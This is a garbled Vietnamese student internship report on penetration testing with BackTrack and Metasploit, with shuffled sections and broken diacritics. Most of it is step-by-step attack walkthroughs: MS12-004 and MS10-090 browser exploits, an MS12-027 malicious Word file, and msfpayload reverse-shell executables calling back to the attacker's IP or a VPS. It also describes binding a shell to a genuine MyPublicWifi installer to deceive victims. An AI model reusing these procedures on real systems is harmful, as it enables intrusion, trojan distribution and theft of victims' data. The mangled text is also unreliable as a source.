Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
2
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
13 QUAacute TRIgraveNH PHAacuteT TRIỂN
Từ năm 2004 - 2006 Trung tacircm coacute nhiều bước phaacutet triển vagrave chuyển migravenh Trung tacircm trở
thagravenh một trong những địa chỉ đaacuteng tin cậy của nhiều doanh nghiệp nhằm cagravei đặt hệ thống
an ninh vagrave đagraveo tạo cho đội ngũ nhacircn viecircn caacutec doanh nghiệp về caacutec chương trigravenh quản lyacute
dự aacuten MS Project 2003 kỹ năng thương mại điện tử vagrave bảo mật webvagrave lagrave địa chỉ đaacuteng
tin cậy của nhiều học sinh sinh viecircn đến đăng kyacute học Đogravei hỏi cấp thiết trong thời gian
nagravey của trung tacircm lagrave nacircng cao hơn nữa đội ngũ giảng viecircn cũng như cơ sở để đaacutep ứng
nhu cầu ngagravey cagraveng cao về cocircng nghệ thocircng tin của đất nước noacutei chung doanh nghiệp caacute
nhacircn noacutei riecircng
Đến năm 2006 Trung tacircm đagraveo tạo vagrave quản trị mạng Athena mở ra một chi nhaacutenh tại cư xaacute
Nguyễn Văn Trỗi Đồng thời tiếp tục tuyển dụng đội ngũ giảng viecircn lagrave những chuyecircn gia
an ninh mạng tốt nghiệp caacutec trường đại học vagrave học viện cocircng nghệ thocircng tin uy tiacuten trecircn
toagraven quốc đồng thời trong thơi gian nagravey Athena coacute nhiều chiacutenh saacutech ưu đatildei nhằm thu huacutet
đội ngũ nhacircn lực cocircng nghệ thocircng tin lagravenh nghề từ caacutec tổ chức doanh nghiệp nhằm lagravem
giagraveu thecircm đội ngũ của trung tacircm
Đến năm 2008 Hagraveng loạt caacutec trung tacircm đagraveo tạo quản trị vagrave an ninh mạng mọc lecircn cugraveng
với khủng hoảng kinh tế tagravei chiacutenh toagraven cầu đatilde lagravem cho Trung tacircm gặp nhiều khoacute khăn
Ocircng Nguyễn Thế Đocircng cugraveng ocircng Hứa Văn Thế Phuacutec ruacutet vocircn khỏi cocircng ty gacircy necircn sự
hoang man cho toagraven bộ hệ thống của trung tacircm cộng thecircm hoạt động tại chi nhaacutenh
Nguyễn Văn Trỗi khocircng cograven hiệu quả phải đoacuteng cửa lagravem cho trung tacircm rơi từ khoacute khăn
nagravey đến khoacute khăn khaacutec
Luacutec nagravey với quyết tacircm khocirci phục lại cocircng ty cũng như tiếp tục sứ mạng goacutep phần vagraveo
tiến trigravenh tin học hoacutea đất nước Ocircng Votilde Đỗ Thắng mua lại cổ phần của hai nhagrave đầu tư lecircn
lagravem giaacutem đốc vagrave xacircy dựng lại trung tacircm mở ra một lagraven gioacute mới vagrave giai đoạn mới cugraveng
với quyết tacircm mạnh mẽ vagrave tinh thần theacutep đatilde giuacutep ocircng vượt qua nhiều khoacute khăn ban đầu
giuacutep trung tacircm đứng vững trong thời kỳ khủng hoảng
Từ năm 2009 - nay Cugraveng với sự latildenh đạo tagravei tigravenh vagrave đầu oacutec chiến lược trung tacircm dần
được phục hồi vagrave trở lại quỹ đạo hoạt động của migravenh Đến nay trung tacircm đatilde trở thagravenh
một trong những trung tacircm đagraveo tạo quản trị mạng hagraveng đầu Việt Nam Cugraveng với sự liecircn
kết rất nhiều cocircng ty vagrave doanh nghiệp trung tacircm trở thagravenh nơi đagraveo tạo vagrave cung cấp nguồn
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
